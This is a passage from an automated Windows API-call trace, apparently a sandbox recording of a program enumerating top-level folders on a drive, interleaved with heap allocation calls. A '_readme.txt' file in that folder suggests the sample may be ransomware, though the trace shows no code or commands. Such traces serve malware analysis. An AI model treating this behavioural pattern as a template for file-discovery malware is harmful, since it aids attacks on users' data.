| out: hHeap=0x2c0000) returned 1 [0179.662] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a059d8 | out: hHeap=0x2c0000) returned 1 [0179.662] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7658 | out: hHeap=0x2c0000) returned 1 [0179.662] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbb48 | out: hHeap=0x2c0000) returned 1 [0179.662] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7658 [0179.663] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7568 | out: hHeap=0x2c0000) returned 1 [0179.663] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad75e0 | out: hHeap=0x2c0000) returned 1 [0179.663] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xa4b500d0, ftLastAccessTime.dwHighDateTime=0x1d8a744, ftLastWriteTime.dwLowDateTime=0xa4b500d0, ftLastWriteTime.dwHighDateTime=0x1d8a744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Program Files", cAlternateFileName="PROGRA~1")) returned 1 [0179.663] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0179.663] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42510 [0179.663] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42580 [0179.664] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42510 | out: hHeap=0x2c0000) returned 1 [0179.664] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0179.664] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd8ab1dc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1434c8c0, ftLastAccessTime.dwHighDateTime=0x1d8a6e9, ftLastWriteTime.dwLowDateTime=0x1434c8c0, ftLastWriteTime.dwHighDateTime=0x1d8a6e9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Program Files (x86)", cAlternateFileName="PROGRA~2")) returned 1 [0179.664] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0179.664] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42510 [0179.664] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xfc) returned 0x2f5b18 [0179.664] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0179.664] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad75e0 [0179.664] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a059d8 [0179.665] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7568 [0179.665] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0179.665] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425f0 [0179.665] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42548 | out: hHeap=0x2c0000) returned 1 [0179.665] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76d0 | out: hHeap=0x2c0000) returned 1 [0179.666] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05a68 | out: hHeap=0x2c0000) returned 1 [0179.666] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76f8 | out: hHeap=0x2c0000) returned 1 [0179.666] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7658 | out: hHeap=0x2c0000) returned 1 [0179.666] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42580 | out: hHeap=0x2c0000) returned 1 [0179.667] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29edc48 | out: hHeap=0x2c0000) returned 1 [0179.667] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42580 [0179.667] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42510 | out: hHeap=0x2c0000) returned 1 [0179.667] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0179.667] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1f2b3de0, ftLastAccessTime.dwHighDateTime=0x1d8a6e9, ftLastWriteTime.dwLowDateTime=0x1f2b3de0, ftLastWriteTime.dwHighDateTime=0x1d8a6e9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ProgramData", cAlternateFileName="PROGRA~3")) returned 1 [0179.668] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7658 [0179.668] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76f8 [0179.668] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76d0 [0179.668] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76f8 | out: hHeap=0x2c0000) returned 1 [0179.668] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7658 | out: hHeap=0x2c0000) returned 1 [0179.668] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x7844bbf0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x78471d50, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x78471d50, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Recovery", cAlternateFileName="")) returned 1 [0179.668] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7658 [0179.668] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76f8 [0179.669] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7720 [0179.669] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76f8 | out: hHeap=0x2c0000) returned 1 [0179.669] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7658 | out: hHeap=0x2c0000) returned 1 [0179.669] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xa3740380, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0xbd8bb9c0, ftLastAccessTime.dwHighDateTime=0x1d8a6e8, ftLastWriteTime.dwLowDateTime=0xbd8bb9c0, ftLastWriteTime.dwHighDateTime=0x1d8a6e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="System Volume Information", cAlternateFileName="SYSTEM~1")) returned 1 [0179.669] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a68 [0179.669] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a20 [0179.669] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x16c) returned 0x29dcde8 [0179.669] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0179.670] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7658 [0179.670] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05ab0 [0179.670] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76f8 [0179.670] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7748 [0179.670] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42510 [0179.670] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42548 [0179.670] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7770 [0179.670] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0179.670] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0179.671] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad75e0 | out: hHeap=0x2c0000) returned 1 [0179.671] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a059d8 | out: hHeap=0x2c0000) returned 1 [0179.671] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7568 | out: hHeap=0x2c0000) returned 1 [0179.671] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0179.672] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425f0 | out: hHeap=0x2c0000) returned 1 [0179.672] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42580 | out: hHeap=0x2c0000) returned 1 [0179.672] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76d0 | out: hHeap=0x2c0000) returned 1 [0179.673] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7720 | out: hHeap=0x2c0000) returned 1 [0179.673] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0179.673] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a059d8 [0179.673] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05a20 | out: hHeap=0x2c0000) returned 1 [0179.674] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05a68 | out: hHeap=0x2c0000) returned 1 [0179.674] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa8185b60, ftCreationTime.dwHighDateTime=0x1d8a8d3, ftLastAccessTime.dwLowDateTime=0xa81abcc0, ftLastAccessTime.dwHighDateTime=0x1d8a8d3, ftLastWriteTime.dwLowDateTime=0xa81abcc0, ftLastWriteTime.dwHighDateTime=0x1d8a8d3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SystemID", cAlternateFileName="")) returned 1 [0179.674] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7720 [0179.674] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76d0 [0179.674] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0179.674] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76d0 | out: hHeap=0x2c0000) returned 1 [0179.674] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7720 | out: hHeap=0x2c0000) returned 1 [0179.674] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x791634f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x791634f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 1 [0179.675] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7720 [0179.675] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76d0 [0179.675] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7568 [0179.675] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76d0 | out: hHeap=0x2c0000) returned 1 [0179.675] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7720 | out: hHeap=0x2c0000) returned 1 [0179.675] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xa4dfd990, ftLastAccessTime.dwHighDateTime=0x1d8a744, ftLastWriteTime.dwLowDateTime=0xa4dfd990, ftLastWriteTime.dwHighDateTime=0x1d8a744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 1 [0179.675] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7720 [0179.675] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76d0 [0179.675] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad75e0 [0179.676] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76d0 | out: hHeap=0x2c0000) returned 1 [0179.676] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7720 | out: hHeap=0x2c0000) returned 1 [0179.676] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x12020, ftCreationTime.dwLowDateTime=0xe51cee90, ftCreationTime.dwHighDateTime=0x1d8a8d3, ftLastAccessTime.dwLowDateTime=0xe51cee90, ftLastAccessTime.dwHighDateTime=0x1d8a8d3, ftLastWriteTime.dwLowDateTime=0xe51f4ff0, ftLastWriteTime.dwHighDateTime=0x1d8a8d3, nFileSizeHigh=0x0, nFileSizeLow=0x45c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0179.676] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x12020, ftCreationTime.dwLowDateTime=0xe51cee90, ftCreationTime.dwHighDateTime=0x1d8a8d3, ftLastAccessTime.dwLowDateTime=0xe51cee90, ftLastAccessTime.dwHighDateTime=0x1d8a8d3, ftLastWriteTime.dwLowDateTime=0xe51f4ff0, ftLastWriteTime.dwHighDateTime=0x1d8a8d3, nFileSizeHigh=0x0, nFileSizeLow=0x45c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0179.676] FindClose (in: hFindFile=0x2a05da8 | out: hFindFile=0x2a05da8) returned 1 [0179.677] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.677] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42580 [0179.677] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0179.678] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425f0 [0179.678] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0179.678] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.678] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425f0 | out: hHeap=0x2c0000) returned 1 [0179.678] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425f0 [0179.679] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0179.679] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.679] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425f0 | out: hHeap=0x2c0000) returned 1 [0179.679] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425f0 [0179.679] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0179.680] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.680] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425f0 | out: hHeap=0x2c0000) returned 1 [0179.680] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425f0 [0179.680] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0179.680] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.681] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425f0 | out: hHeap=0x2c0000) returned 1 [0179.681] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425f0 [0179.681] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0179.681] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.681] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425f0 | out: hHeap=0x2c0000) returned 1 [0179.681] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425f0 [0179.681] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0179.682] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.682] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425f0 | out: hHeap=0x2c0000) returned 1 [0179.682] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425f0 [0179.682] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0179.682] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2ade6e0 [0179.682] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.683] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0179.683] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425f0 | out: hHeap=0x2c0000) returned 1 [0179.683] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425f0 [0179.683] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0179.683] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.684] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425f0 | out: hHeap=0x2c0000) returned 1 [0179.684] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425f0 [0179.684] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0179.684] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.684] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425f0 | out: hHeap=0x2c0000) returned 1 [0179.684] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425f0 [0179.684] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0179.685] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.685] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425f0 | out: hHeap=0x2c0000) returned 1 [0179.685] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425f0 [0179.685] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0179.685] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.686] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425f0 | out: hHeap=0x2c0000) returned 1 [0179.686] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425f0 [0179.686] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0179.686] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.686] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425f0 | out: hHeap=0x2c0000) returned 1 [0179.686] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425f0 [0179.686] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0179.687] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.687] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425f0 | out: hHeap=0x2c0000) returned 1 [0179.687] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425f0 [0179.687] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0179.687] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.688] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425f0 | out: hHeap=0x2c0000) returned 1 [0179.688] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425f0 [0179.688] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0179.688] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.688] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425f0 | out: hHeap=0x2c0000) returned 1 [0179.688] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425f0 [0179.688] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0179.689] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.689] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425f0 | out: hHeap=0x2c0000) returned 1 [0179.689] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425f0 [0179.689] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0179.689] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.690] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425f0 | out: hHeap=0x2c0000) returned 1 [0179.690] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42580 | out: hHeap=0x2c0000) returned 1 [0179.690] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7720 [0179.690] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0179.690] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76d0 [0179.690] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0179.690] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.691] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76d0 | out: hHeap=0x2c0000) returned 1 [0179.691] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76d0 [0179.691] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0179.691] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.691] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76d0 | out: hHeap=0x2c0000) returned 1 [0179.691] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76d0 [0179.691] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0179.691] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.692] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76d0 | out: hHeap=0x2c0000) returned 1 [0179.692] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76d0 [0179.692] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0179.692] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.692] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76d0 | out: hHeap=0x2c0000) returned 1 [0179.692] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76d0 [0179.692] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0179.693] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.693] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76d0 | out: hHeap=0x2c0000) returned 1 [0179.693] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76d0 [0179.693] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0179.693] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.694] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76d0 | out: hHeap=0x2c0000) returned 1 [0179.694] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76d0 [0179.694] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0179.694] RtlAllocateHeap (HeapHandle=0x2c0000, 